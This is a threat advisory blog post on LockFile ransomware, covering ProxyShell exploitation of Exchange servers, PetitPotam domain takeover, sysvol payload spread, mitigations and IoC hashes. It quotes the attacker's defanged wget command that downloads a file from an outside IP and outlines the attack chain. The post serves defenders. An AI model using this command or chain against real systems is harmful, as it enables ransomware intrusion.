Researchers have observed new ransomware dubbed as “LockFile ransomware” targetting Unpatched Microsoft Exchange servers. Threat actors will gain access to the Victim’s network through Microsoft exchange servers by exploiting the three chained Microsoft Exchange vulnerabilities tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. After exploiting the Exchange server, threat actors use PetitPotam vulnerability to take over Windows domains and encrypt the compromised systems. Successful exploitation of these vulnerabilities results in unauthenticated Remote Code execution. It’s important to know how does LockFile ransomware compromises the domain controller and how to protect exchange servers from the new LockFile ransomware.
Table of Contents
Victims Of The New LockFile Ransomware
This new LockFile ransomware has compromised at least more than 10 businesses in the ongoing campaign. The campaign didn’t keep a specific target at the time of writing this post. However, it seems to be targeting victims in various sectors around the globe: manufacturing, engineering, business services, legal, financial services, travel, and tourism sectors.
When Was The New LockFile Ransomware Seen?
LockFile ransomware is one of the newly found malware. It was first seen on July 20, 2021, on the network of a U.S. Its first action was recorded as recently as August 20. However, Comprehensive analysis is still underway. We will come to know more and more about ransomware as we progress in analysis. You can track the updates here.
The LockFile Ransom Note:
Like other ransomware, LockFile leaves a ransom note with standard instructions and contact information to the Victim.
Figure 1. The LockFile ransom note
How Does The New LockFile Ransomware Compromise The Victim?
In the previous sections, we have seen about the new LockFilw ransomware and its victims. In this section, we will see how does LockFile Ransomware Compromise the Victim.
- The initial attack vector is still unknown. However, researchers suspected that threat actors might have use proxyshell chain vulnerabilities tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 were used to compromise the exchange servers.
- Once the actor compromises the exchange, he runs wget commands on the PowerShell to download some unknown files from the IP address 209.14.0[.]234. > wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH
- Typically, before 20 to 30 minutes of installing ransomware, the actor installs a set of tools’ efspotato.exe‘, an exploit for the CVE-2021-36942 vulnerability, active_desktop_render.dll, and active_desktop_launcher.exe on the compromised exchange server.
- The actor use active_desktop_launcher.exe, a legitimate version of KuGou Active Desktop file to load the active_desktop_render.dll file. The active_desktop_render.dll then decrypt a file in the local directory called ‘desktop.ini,’ which is a shellcode. Further analysis is yet to be done to reveal more information about ‘desktop.ini.’
- Shellcode inside the desktop.ini file activates the efspotato.exe file, which has an exploit for the PetitPotam NTLM relay attack.
- After the successful exploitation of the PetitPotam vulnerability on local domain controllers, The actor will copy the LockFile ransomware file with a batch file and supporting executables on the compromised domain controllers under the ‘sysvol\domain\scripts’ directory.
- Files inside the ‘sysvol’ directory:
- Autologin.bat
- Autologin.exe
- Autologin.dll
- Autologin.sys
- Autoupdate.exe
- The LockFile ransomware will copy the batch scripts and other executables inside the “sysvol\domain\scripts” directory to the clients when they try authenticating with the domain controller.
How You Should Protect Domain Controllers From The New LockFile Ransomware?
- It is recommended to keep the operating system updated to the current released patch level. Since LockFile ransomware targets the Victim using the Microsoft Exchange ProxyShell vulnerabilities and the Windows PetitPotam NTLM Relay vulnerability.
- Check for the presence of attack indicators in your network and deploy detection rules at the network and endpoint levels. Block IOC‘s as mentioned in this advisory.
- Keep Anti-malware solutions at the endpoint and network-level updated at all times.
- Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activities on endpoints.
Indicators Of Compromise (IoC) Of The New LockFile Ransomware:
IP address: 209.14.0.234
| File hashes | Description |
|---|---|
| ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 | active_desktop_render.dll |
| cafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 | autoupdate.exe |
| 36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 | autologin.sys |
| 5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f | autologin.exe |
| 1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 | autologin.dll |
| 2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a | autoupdate.exe |
| 7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd | efspotato.exe |
| c020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 | active_desktop_render.dll |
| a926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 | autoupdate.exe |
| 368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 | autologin.sys |
| d030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a | autoupdate.exe |
| a0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 | autoupdate.exe |
Thanks for reading this threat post. Please make sure you are protected from the new LockFile ransomware and share this poet to protect others.
Read more such interesting articles on wordpress-753125-2540596.cloudwaysapps.com.
